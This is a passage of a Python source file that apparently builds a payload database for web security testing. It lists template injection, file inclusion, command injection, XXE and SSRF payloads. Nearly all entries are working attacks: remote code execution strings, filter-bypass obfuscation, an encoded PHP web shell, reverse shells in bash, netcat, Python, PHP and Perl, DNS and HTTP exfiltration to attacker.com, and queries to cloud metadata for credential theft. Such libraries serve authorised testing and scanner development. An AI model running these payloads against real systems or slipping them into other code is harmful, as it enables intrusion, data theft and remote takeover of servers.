        use_case="Freemarker with object access",
        bypass_technique="reflection",
        platform="freemarker",
        context="body",
        tags=["file-read", "freemarker"],
    ),
    
    # Velocity Exploitation
    PayloadEntry(
        id=generate_payload_id("ssti", "velocity_rce"),
        name="Velocity RCE",
        category="ssti",
        payload='#set($e="")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("id")',
        description="RCE via Java reflection",
        use_case="Velocity templates",
        bypass_technique="reflection",
        platform="velocity",
        context="body",
        tags=["rce", "velocity"],
    ),
    
    # Smarty Exploitation
    PayloadEntry(
        id=generate_payload_id("ssti", "smarty_rce"),
        name="Smarty RCE",
        category="ssti",
        payload="{php}system('id');{/php}",
        description="RCE via PHP tag (older versions)",
        use_case="Smarty with PHP enabled",
        bypass_technique=None,
        platform="smarty",
        context="body",
        tags=["rce", "smarty"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "smarty_rce_2"),
        name="Smarty RCE - Literal",
        category="ssti",
        payload="{literal}<script>alert('XSS')</script>{/literal}",
        description="XSS via literal block",
        use_case="Smarty templates",
        bypass_technique="literal",
        platform="smarty",
        context="body",
        tags=["xss", "smarty"],
    ),
    
    # Mako Exploitation
    PayloadEntry(
        id=generate_payload_id("ssti", "mako_rce"),
        name="Mako RCE",
        category="ssti",
        payload="<%import os%>${os.popen('id').read()}",
        description="RCE via import statement",
        use_case="Mako templates (Python)",
        bypass_technique=None,
        platform="mako",
        context="body",
        tags=["rce", "mako"],
    ),
    
    # Bypass Techniques
    PayloadEntry(
        id=generate_payload_id("ssti", "bypass_underscore"),
        name="SSTI Bypass - Underscore Filter",
        category="ssti",
        payload="{{request|attr('application')|attr('\\x5f\\x5fglobals\\x5f\\x5f')}}",
        description="Hex encoded underscores",
        use_case="When _ is filtered",
        bypass_technique="hex-encoding",
        platform="jinja2",
        context="body",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "bypass_brackets"),
        name="SSTI Bypass - Bracket Filter",
        category="ssti",
        payload="{{request|attr('application')|attr('__globals__')|attr('__getitem__')('os')}}",
        description="attr() instead of brackets",
        use_case="When [] is filtered",
        bypass_technique="attr-function",
        platform="jinja2",
        context="body",
        tags=["bypass", "syntax"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "bypass_quotes"),
        name="SSTI Bypass - Quote Filter",
        category="ssti",
        payload="{{request|attr(request.args.param1)}}",
        description="Get string from request args",
        use_case="When quotes are filtered",
        bypass_technique="request-args",
        platform="jinja2",
        context="body",
        tags=["bypass", "external-input"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssti", "bypass_concat"),
        name="SSTI Bypass - String Concat",
        category="ssti",
        payload="{{''['__cla''ss__']}}",
        description="String concatenation",
        use_case="Keyword filters",
        bypass_technique="string-concat",
        platform="jinja2",
        context="body",
        tags=["bypass", "string"],
    ),
]


# ============================================================================
# LFI/RFI Payloads
# ============================================================================

LFI_PAYLOADS = [
    # Basic LFI
    PayloadEntry(
        id=generate_payload_id("lfi", "basic"),
        name="Basic LFI - /etc/passwd",
        category="lfi",
        payload="../../../etc/passwd",
        description="Read /etc/passwd",
        use_case="Basic LFI testing",
        bypass_technique=None,
        platform="linux",
        context="url",
        tags=["basic", "linux"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "win_hosts"),
        name="Basic LFI - Windows hosts",
        category="lfi",
        payload="..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
        description="Read Windows hosts file",
        use_case="Windows LFI testing",
        bypass_technique=None,
        platform="windows",
        context="url",
        tags=["basic", "windows"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "absolute"),
        name="LFI - Absolute Path",
        category="lfi",
        payload="/etc/passwd",
        description="Absolute path traversal",
        use_case="When relative fails",
        bypass_technique=None,
        platform="linux",
        context="url",
        tags=["basic", "absolute"],
    ),
    
    # Encoding Bypass
    PayloadEntry(
        id=generate_payload_id("lfi", "url_encode"),
        name="LFI - URL Encoded",
        category="lfi",
        payload="..%2F..%2F..%2Fetc%2Fpasswd",
        description="URL encoded traversal",
        use_case="Basic filter bypass",
        bypass_technique="url-encoding",
        platform="linux",
        context="url",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "double_encode"),
        name="LFI - Double URL Encoded",
        category="lfi",
        payload="..%252F..%252F..%252Fetc%252Fpasswd",
        description="Double URL encoded traversal",
        use_case="Multiple decode passes",
        bypass_technique="double-encoding",
        platform="linux",
        context="url",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "unicode"),
        name="LFI - Unicode Encoding",
        category="lfi",
        payload="..%c0%af..%c0%af..%c0%afetc/passwd",
        description="Unicode overlong encoding",
        use_case="Certain parsers/servers",
        bypass_technique="unicode",
        platform="linux",
        context="url",
        tags=["bypass", "encoding"],
    ),
    
    # Null Byte
    PayloadEntry(
        id=generate_payload_id("lfi", "null_byte"),
        name="LFI - Null Byte",
        category="lfi",
        payload="../../../etc/passwd%00",
        description="Null byte to truncate extension",
        use_case="PHP < 5.3.4",
        bypass_technique="null-byte",
        platform="linux",
        context="url",
        tags=["bypass", "null-byte"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "null_byte_double"),
        name="LFI - Null Byte Encoded",
        category="lfi",
        payload="../../../etc/passwd%2500",
        description="Encoded null byte",
        use_case="Filter bypass",
        bypass_technique="null-byte",
        platform="linux",
        context="url",
        tags=["bypass", "null-byte"],
    ),
    
    # Path Truncation
    PayloadEntry(
        id=generate_payload_id("lfi", "long_path"),
        name="LFI - Path Truncation",
        category="lfi",
        payload="../../../etc/passwd/./././././././././" + "./" * 2048,
        description="Overflow path length",
        use_case="PHP on Windows (260 char limit)",
        bypass_technique="truncation",
        platform="windows",
        context="url",
        tags=["bypass", "truncation"],
    ),
    
    # PHP Wrappers
    PayloadEntry(
        id=generate_payload_id("lfi", "php_filter"),
        name="LFI - PHP Filter Base64",
        category="lfi",
        payload="php://filter/convert.base64-encode/resource=index.php",
        description="Read PHP source via base64",
        use_case="PHP source code disclosure",
        bypass_technique="php-wrapper",
        platform="php",
        context="url",
        tags=["php-wrapper", "source-code"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "php_input"),
        name="LFI to RCE - PHP Input",
        category="lfi",
        payload="php://input",
        description="Execute POST data as PHP",
        use_case="LFI to RCE (expect wrapper)",
        bypass_technique="php-wrapper",
        platform="php",
        context="url",
        tags=["php-wrapper", "rce"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "php_data"),
        name="LFI to RCE - Data Wrapper",
        category="lfi",
        payload="data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
        description="Execute base64 encoded PHP",
        use_case="LFI to RCE",
        bypass_technique="php-wrapper",
        platform="php",
        context="url",
        tags=["php-wrapper", "rce"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "php_expect"),
        name="LFI to RCE - Expect Wrapper",
        category="lfi",
        payload="expect://id",
        description="Execute command via expect",
        use_case="expect extension enabled",
        bypass_technique="php-wrapper",
        platform="php",
        context="url",
        tags=["php-wrapper", "rce"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "php_zip"),
        name="LFI to RCE - Zip Wrapper",
        category="lfi",
        payload="zip://path/to/file.zip%23shell.php",
        description="Include file from ZIP archive",
        use_case="When ZIP upload is allowed",
        bypass_technique="php-wrapper",
        platform="php",
        context="url",
        tags=["php-wrapper", "rce", "upload"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "php_phar"),
        name="LFI to RCE - Phar Wrapper",
        category="lfi",
        payload="phar://path/to/file.phar/shell.php",
        description="Include file from PHAR archive",
        use_case="PHAR deserialization",
        bypass_technique="php-wrapper",
        platform="php",
        context="url",
        tags=["php-wrapper", "rce", "phar"],
    ),
    
    # Log Poisoning
    PayloadEntry(
        id=generate_payload_id("lfi", "log_apache"),
        name="LFI Log Poisoning - Apache",
        category="lfi",
        payload="../../../var/log/apache2/access.log",
        description="Include Apache access log",
        use_case="After poisoning User-Agent",
        bypass_technique="log-poisoning",
        platform="linux",
        context="url",
        tags=["log-poisoning", "rce"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "log_nginx"),
        name="LFI Log Poisoning - Nginx",
        category="lfi",
        payload="../../../var/log/nginx/access.log",
        description="Include Nginx access log",
        use_case="After poisoning User-Agent",
        bypass_technique="log-poisoning",
        platform="linux",
        context="url",
        tags=["log-poisoning", "rce"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "log_ssh"),
        name="LFI Log Poisoning - SSH",
        category="lfi",
        payload="../../../var/log/auth.log",
        description="Include SSH auth log",
        use_case="After poisoning with SSH username",
        bypass_technique="log-poisoning",
        platform="linux",
        context="url",
        tags=["log-poisoning", "rce"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "log_mail"),
        name="LFI Log Poisoning - Mail",
        category="lfi",
        payload="../../../var/log/mail.log",
        description="Include mail log",
        use_case="After sending poisoned email",
        bypass_technique="log-poisoning",
        platform="linux",
        context="url",
        tags=["log-poisoning", "rce"],
    ),
    
    # Session Poisoning
    PayloadEntry(
        id=generate_payload_id("lfi", "session_php"),
        name="LFI Session Poisoning - PHP",
        category="lfi",
        payload="../../../var/lib/php/sessions/sess_[SESSIONID]",
        description="Include PHP session file",
        use_case="After poisoning session data",
        bypass_technique="session-poisoning",
        platform="php",
        context="url",
        tags=["session-poisoning", "rce"],
    ),
    
    # /proc
    PayloadEntry(
        id=generate_payload_id("lfi", "proc_self_environ"),
        name="LFI - /proc/self/environ",
        category="lfi",
        payload="../../../proc/self/environ",
        description="Read process environment",
        use_case="Leak secrets from env vars",
        bypass_technique=None,
        platform="linux",
        context="url",
        tags=["proc", "secrets"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "proc_self_fd"),
        name="LFI - /proc/self/fd",
        category="lfi",
        payload="../../../proc/self/fd/0",
        description="Read stdin of process",
        use_case="Data leakage",
        bypass_technique=None,
        platform="linux",
        context="url",
        tags=["proc", "data-leak"],
    ),
    PayloadEntry(
        id=generate_payload_id("lfi", "proc_cmdline"),
        name="LFI - /proc/self/cmdline",
        category="lfi",
        payload="../../../proc/self/cmdline",
        description="Read command line arguments",
        use_case="Leak secrets passed as args",
        bypass_technique=None,
        platform="linux",
        context="url",
        tags=["proc", "secrets"],
    ),
]


# ============================================================================
# Command Injection Payloads
# ============================================================================

RCE_PAYLOADS = [
    # Basic Command Injection
    PayloadEntry(
        id=generate_payload_id("rce", "semicolon"),
        name="Command Injection - Semicolon",
        category="rce",
        payload="; id",
        description="Chain command with semicolon",
        use_case="Basic command injection",
        bypass_technique=None,
        platform="linux",
        context="body",
        tags=["basic", "linux"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "pipe"),
        name="Command Injection - Pipe",
        category="rce",
        payload="| id",
        description="Pipe to new command",
        use_case="Command injection",
        bypass_technique=None,
        platform="linux",
        context="body",
        tags=["basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "ampersand"),
        name="Command Injection - Ampersand",
        category="rce",
        payload="& id",
        description="Background command execution",
        use_case="Command injection",
        bypass_technique=None,
        context="body",
        tags=["basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "double_ampersand"),
        name="Command Injection - AND",
        category="rce",
        payload="&& id",
        description="Execute if first succeeds",
        use_case="Command injection",
        bypass_technique=None,
        context="body",
        tags=["basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "double_pipe"),
        name="Command Injection - OR",
        category="rce",
        payload="|| id",
        description="Execute if first fails",
        use_case="Command injection",
        bypass_technique=None,
        context="body",
        tags=["basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "newline"),
        name="Command Injection - Newline",
        category="rce",
        payload="%0aid",
        description="Newline character injection",
        use_case="Multi-line command",
        bypass_technique=None,
        context="body",
        tags=["basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "backtick"),
        name="Command Injection - Backtick",
        category="rce",
        payload="`id`",
        description="Command substitution",
        use_case="Inline command execution",
        bypass_technique=None,
        context="body",
        tags=["substitution"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "dollar_paren"),
        name="Command Injection - $()",
        category="rce",
        payload="$(id)",
        description="Command substitution",
        use_case="Modern shells",
        bypass_technique=None,
        context="body",
        tags=["substitution"],
    ),
    
    # Windows Command Injection
    PayloadEntry(
        id=generate_payload_id("rce", "win_ampersand"),
        name="Command Injection - Windows &",
        category="rce",
        payload="& whoami",
        description="Windows command chain",
        use_case="Windows command injection",
        bypass_technique=None,
        platform="windows",
        context="body",
        tags=["basic", "windows"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "win_pipe"),
        name="Command Injection - Windows Pipe",
        category="rce",
        payload="| whoami",
        description="Windows pipe",
        use_case="Windows command injection",
        bypass_technique=None,
        platform="windows",
        context="body",
        tags=["basic", "windows"],
    ),
    
    # Bypass Techniques
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_space_ifs"),
        name="RCE Bypass - IFS",
        category="rce",
        payload=";id${IFS}",
        description="IFS as space replacement",
        use_case="When space is filtered",
        bypass_technique="ifs",
        platform="linux",
        context="body",
        tags=["bypass", "whitespace"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_space_tab"),
        name="RCE Bypass - Tab",
        category="rce",
        payload=";id%09",
        description="Tab instead of space",
        use_case="Space filter bypass",
        bypass_technique="tab",
        context="body",
        tags=["bypass", "whitespace"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_space_brace"),
        name="RCE Bypass - Brace Expansion",
        category="rce",
        payload=";{cat,/etc/passwd}",
        description="Brace expansion for arguments",
        use_case="Bash space bypass",
        bypass_technique="brace-expansion",
        platform="linux",
        context="body",
        tags=["bypass", "whitespace"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_cat_alternative"),
        name="RCE Bypass - Cat Alternatives",
        category="rce",
        payload=";tac /etc/passwd",
        description="Use tac instead of cat",
        use_case="When cat is blacklisted",
        bypass_technique="command-alternative",
        platform="linux",
        context="body",
        tags=["bypass", "command"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_quote_break"),
        name="RCE Bypass - Quote Break",
        category="rce",
        payload="c'a't /etc/passwd",
        description="Break command with quotes",
        use_case="Keyword filter bypass",
        bypass_technique="quote-break",
        platform="linux",
        context="body",
        tags=["bypass", "syntax"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_backslash"),
        name="RCE Bypass - Backslash",
        category="rce",
        payload="c\\at /etc/passwd",
        description="Backslash in command",
        use_case="Keyword filter bypass",
        bypass_technique="backslash",
        platform="linux",
        context="body",
        tags=["bypass", "syntax"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_wildcard"),
        name="RCE Bypass - Wildcards",
        category="rce",
        payload="/???/??t /etc/passwd",
        description="Wildcards for path",
        use_case="Path keyword bypass",
        bypass_technique="wildcard",
        platform="linux",
        context="body",
        tags=["bypass", "wildcard"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_env_var"),
        name="RCE Bypass - Environment Variables",
        category="rce",
        payload='$0<<<$\'\\x69\\x64\'',
        description="Hex encoded command via stdin",
        use_case="Strong keyword filters",
        bypass_technique="env-variable",
        platform="linux",
        context="body",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_base64"),
        name="RCE Bypass - Base64 Decode",
        category="rce",
        payload="echo aWQ= | base64 -d | bash",
        description="Base64 encoded command",
        use_case="Keyword filter bypass",
        bypass_technique="base64",
        platform="linux",
        context="body",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "bypass_rev"),
        name="RCE Bypass - Reverse String",
        category="rce",
        payload="echo 'di' | rev | bash",
        description="Reverse string command",
        use_case="Keyword filter bypass",
        bypass_technique="string-reverse",
        platform="linux",
        context="body",
        tags=["bypass", "obfuscation"],
    ),
    
    # Blind Command Injection
    PayloadEntry(
        id=generate_payload_id("rce", "blind_sleep"),
        name="Blind RCE - Sleep",
        category="rce",
        payload="; sleep 10",
        description="Time-based detection",
        use_case="Confirm blind injection",
        bypass_technique=None,
        platform="linux",
        context="body",
        tags=["blind", "time-based"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "blind_ping"),
        name="Blind RCE - Ping",
        category="rce",
        payload="; ping -c 10 127.0.0.1",
        description="Time-based via ping",
        use_case="When sleep unavailable",
        bypass_technique=None,
        platform="linux",
        context="body",
        tags=["blind", "time-based"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "blind_dns"),
        name="Blind RCE - DNS Exfil",
        category="rce",
        payload="; nslookup $(whoami).attacker.com",
        description="DNS exfiltration",
        use_case="Data extraction",
        bypass_technique=None,
        platform="linux",
        context="body",
        tags=["blind", "oob", "dns"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "blind_curl"),
        name="Blind RCE - HTTP Exfil",
        category="rce",
        payload="; curl http://attacker.com/?d=$(whoami)",
        description="HTTP exfiltration",
        use_case="Data extraction",
        bypass_technique=None,
        platform="linux",
        context="body",
        tags=["blind", "oob", "http"],
    ),
    
    # Reverse Shell
    PayloadEntry(
        id=generate_payload_id("rce", "revshell_bash"),
        name="Reverse Shell - Bash",
        category="rce",
        payload="bash -i >& /dev/tcp/ATTACKER/PORT 0>&1",
        description="Bash TCP reverse shell",
        use_case="Full shell access",
        bypass_technique=None,
        platform="linux",
        context="body",
        tags=["reverse-shell", "bash"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "revshell_nc"),
        name="Reverse Shell - Netcat",
        category="rce",
        payload="nc -e /bin/bash ATTACKER PORT",
        description="Netcat reverse shell",
        use_case="When nc is available",
        bypass_technique=None,
        platform="linux",
        context="body",
        tags=["reverse-shell", "netcat"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "revshell_python"),
        name="Reverse Shell - Python",
        category="rce",
        payload='python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])\'',
        description="Python reverse shell",
        use_case="When Python is available",
        bypass_technique=None,
        context="body",
        tags=["reverse-shell", "python"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "revshell_php"),
        name="Reverse Shell - PHP",
        category="rce",
        payload='php -r \'$sock=fsockopen("ATTACKER",PORT);exec("/bin/sh -i <&3 >&3 2>&3");\'',
        description="PHP reverse shell",
        use_case="PHP CLI available",
        bypass_technique=None,
        context="body",
        tags=["reverse-shell", "php"],
    ),
    PayloadEntry(
        id=generate_payload_id("rce", "revshell_perl"),
        name="Reverse Shell - Perl",
        category="rce",
        payload='perl -e \'use Socket;$i="ATTACKER";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'',
        description="Perl reverse shell",
        use_case="Perl available",
        bypass_technique=None,
        context="body",
        tags=["reverse-shell", "perl"],
    ),
]


# ============================================================================
# XXE Payloads
# ============================================================================

XXE_PAYLOADS = [
    # Basic XXE
    PayloadEntry(
        id=generate_payload_id("xxe", "basic_file"),
        name="XXE - Basic File Read",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
        description="Read local file via XXE",
        use_case="Basic XXE testing",
        bypass_technique=None,
        platform="linux",
        context="body",
        tags=["file-read", "basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("xxe", "basic_file_win"),
        name="XXE - Windows File Read",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>',
        description="Read Windows file via XXE",
        use_case="Windows XXE testing",
        bypass_technique=None,
        platform="windows",
        context="body",
        tags=["file-read", "windows"],
    ),
    
    # Parameter Entity XXE
    PayloadEntry(
        id=generate_payload_id("xxe", "param_entity"),
        name="XXE - Parameter Entity",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]><foo></foo>',
        description="External DTD via parameter entity",
        use_case="Blind XXE setup",
        bypass_technique=None,
        context="body",
        tags=["blind", "parameter-entity"],
    ),
    
    # Blind XXE
    PayloadEntry(
        id=generate_payload_id("xxe", "blind_oob"),
        name="XXE - Blind OOB Exfil",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;%param1;%param2;]><foo></foo>',
        description="Out-of-band data exfiltration",
        use_case="When output not visible",
        bypass_technique=None,
        context="body",
        tags=["blind", "oob"],
    ),
    PayloadEntry(
        id=generate_payload_id("xxe", "blind_dtd"),
        name="XXE - Malicious DTD",
        category="xxe",
        payload='<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'http://attacker.com/?d=%file;\'>">%eval;%exfil;',
        description="Malicious DTD for OOB exfil",
        use_case="Host on attacker server",
        bypass_technique=None,
        context="body",
        tags=["blind", "dtd"],
    ),
    
    # Error-based XXE
    PayloadEntry(
        id=generate_payload_id("xxe", "error_based"),
        name="XXE - Error-based Exfil",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM \'file:///nonexistent/%file;\'>">%eval;%error;]><foo></foo>',
        description="Extract data via error messages",
        use_case="When errors are displayed",
        bypass_technique=None,
        context="body",
        tags=["error-based"],
    ),
    
    # SSRF via XXE
    PayloadEntry(
        id=generate_payload_id("xxe", "ssrf"),
        name="XXE - SSRF to Internal",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/">]><foo>&xxe;</foo>',
        description="SSRF via XXE",
        use_case="Access internal services",
        bypass_technique=None,
        context="body",
        tags=["ssrf"],
    ),
    PayloadEntry(
        id=generate_payload_id("xxe", "ssrf_aws"),
        name="XXE - AWS Metadata SSRF",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>',
        description="Access AWS metadata service",
        use_case="AWS cloud environments",
        bypass_technique=None,
        context="body",
        tags=["ssrf", "aws", "cloud"],
    ),
    
    # PHP XXE
    PayloadEntry(
        id=generate_payload_id("xxe", "php_expect"),
        name="XXE - PHP Expect RCE",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo>',
        description="RCE via expect wrapper",
        use_case="PHP with expect extension",
        bypass_technique=None,
        platform="php",
        context="body",
        tags=["rce", "php"],
    ),
    PayloadEntry(
        id=generate_payload_id("xxe", "php_filter"),
        name="XXE - PHP Filter",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]><foo>&xxe;</foo>',
        description="Base64 encode file contents",
        use_case="Binary/special character files",
        bypass_technique="php-wrapper",
        platform="php",
        context="body",
        tags=["file-read", "php"],
    ),
    
    # CDATA Bypass
    PayloadEntry(
        id=generate_payload_id("xxe", "cdata"),
        name="XXE - CDATA Wrapper",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % start "<![CDATA["><!ENTITY % end "]]>"><!ENTITY % dtd SYSTEM "http://attacker.com/join.dtd">%dtd;]><foo>&joined;</foo>',
        description="Wrap output in CDATA",
        use_case="Handle special characters",
        bypass_technique="cdata",
        context="body",
        tags=["bypass", "cdata"],
    ),
    
    # SVG XXE
    PayloadEntry(
        id=generate_payload_id("xxe", "svg"),
        name="XXE - SVG File Upload",
        category="xxe",
        payload='<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>',
        description="XXE via SVG upload",
        use_case="Image upload functionality",
        bypass_technique=None,
        context="body",
        tags=["file-upload", "svg"],
    ),
    
    # XInclude
    PayloadEntry(
        id=generate_payload_id("xxe", "xinclude"),
        name="XInclude Attack",
        category="xxe",
        payload='<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>',
        description="XInclude for file inclusion",
        use_case="When DTDs are disabled",
        bypass_technique="xinclude",
        context="body",
        tags=["xinclude", "bypass"],
    ),
]


# ============================================================================
# SSRF Payloads
# ============================================================================

SSRF_PAYLOADS = [
    # Basic SSRF
    PayloadEntry(
        id=generate_payload_id("ssrf", "localhost"),
        name="SSRF - Localhost",
        category="ssrf",
        payload="http://localhost/",
        description="Basic localhost access",
        use_case="SSRF testing",
        bypass_technique=None,
        context="url",
        tags=["basic"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "127_0_0_1"),
        name="SSRF - 127.0.0.1",
        category="ssrf",
        payload="http://127.0.0.1/",
        description="Loopback IP",
        use_case="SSRF testing",
        bypass_technique=None,
        context="url",
        tags=["basic"],
    ),
    
    # Bypass Techniques
    PayloadEntry(
        id=generate_payload_id("ssrf", "bypass_decimal"),
        name="SSRF Bypass - Decimal IP",
        category="ssrf",
        payload="http://2130706433/",
        description="127.0.0.1 in decimal",
        use_case="IP format filters",
        bypass_technique="decimal-ip",
        context="url",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "bypass_hex"),
        name="SSRF Bypass - Hex IP",
        category="ssrf",
        payload="http://0x7f000001/",
        description="127.0.0.1 in hex",
        use_case="IP format filters",
        bypass_technique="hex-ip",
        context="url",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "bypass_octal"),
        name="SSRF Bypass - Octal IP",
        category="ssrf",
        payload="http://0177.0.0.1/",
        description="127.0.0.1 in octal",
        use_case="IP format filters",
        bypass_technique="octal-ip",
        context="url",
        tags=["bypass", "encoding"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "bypass_short"),
        name="SSRF Bypass - Short IP",
        category="ssrf",
        payload="http://127.1/",
        description="Shortened 127.0.0.1",
        use_case="Regex bypass",
        bypass_technique="short-ip",
        context="url",
        tags=["bypass"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "bypass_ipv6"),
        name="SSRF Bypass - IPv6",
        category="ssrf",
        payload="http://[::1]/",
        description="IPv6 localhost",
        use_case="IPv4-only filters",
        bypass_technique="ipv6",
        context="url",
        tags=["bypass", "ipv6"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "bypass_dns_rebind"),
        name="SSRF Bypass - DNS Rebinding",
        category="ssrf",
        payload="http://rebind.attacker.com/",
        description="DNS rebinding attack",
        use_case="Bypass DNS validation",
        bypass_technique="dns-rebinding",
        context="url",
        tags=["bypass", "dns"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "bypass_redirect"),
        name="SSRF Bypass - Open Redirect",
        category="ssrf",
        payload="http://attacker.com/redirect?url=http://127.0.0.1/",
        description="Redirect to internal host",
        use_case="URL validation bypass",
        bypass_technique="redirect",
        context="url",
        tags=["bypass", "redirect"],
    ),
    
    # Cloud Metadata
    PayloadEntry(
        id=generate_payload_id("ssrf", "aws_metadata"),
        name="SSRF - AWS Metadata",
        category="ssrf",
        payload="http://169.254.169.254/latest/meta-data/",
        description="AWS EC2 metadata service",
        use_case="AWS credential theft",
        bypass_technique=None,
        context="url",
        tags=["cloud", "aws", "metadata"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "aws_credentials"),
        name="SSRF - AWS Credentials",
        category="ssrf",
        payload="http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        description="AWS IAM credentials",
        use_case="AWS credential theft",
        bypass_technique=None,
        context="url",
        tags=["cloud", "aws", "credentials"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "gcp_metadata"),
        name="SSRF - GCP Metadata",
        category="ssrf",
        payload="http://metadata.google.internal/computeMetadata/v1/",
        description="GCP metadata service",
        use_case="GCP credential theft",
        bypass_technique=None,
        context="url",
        tags=["cloud", "gcp", "metadata"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "azure_metadata"),
        name="SSRF - Azure Metadata",
        category="ssrf",
        payload="http://169.254.169.254/metadata/instance?api-version=2021-02-01",
        description="Azure metadata service",
        use_case="Azure credential theft",
        bypass_technique=None,
        context="url",
        tags=["cloud", "azure", "metadata"],
    ),
    
    # Internal Services
    PayloadEntry(
        id=generate_payload_id("ssrf", "internal_admin"),
        name="SSRF - Internal Admin",
        category="ssrf",
        payload="http://localhost:8080/admin",
        description="Access internal admin panel",
        use_case="Admin panel access",
        bypass_technique=None,
        context="url",
        tags=["internal", "admin"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "internal_redis"),
        name="SSRF - Redis",
        category="ssrf",
        payload="http://localhost:6379/",
        description="Access Redis service",
        use_case="Redis command execution",
        bypass_technique=None,
        context="url",
        tags=["internal", "redis"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "internal_docker"),
        name="SSRF - Docker API",
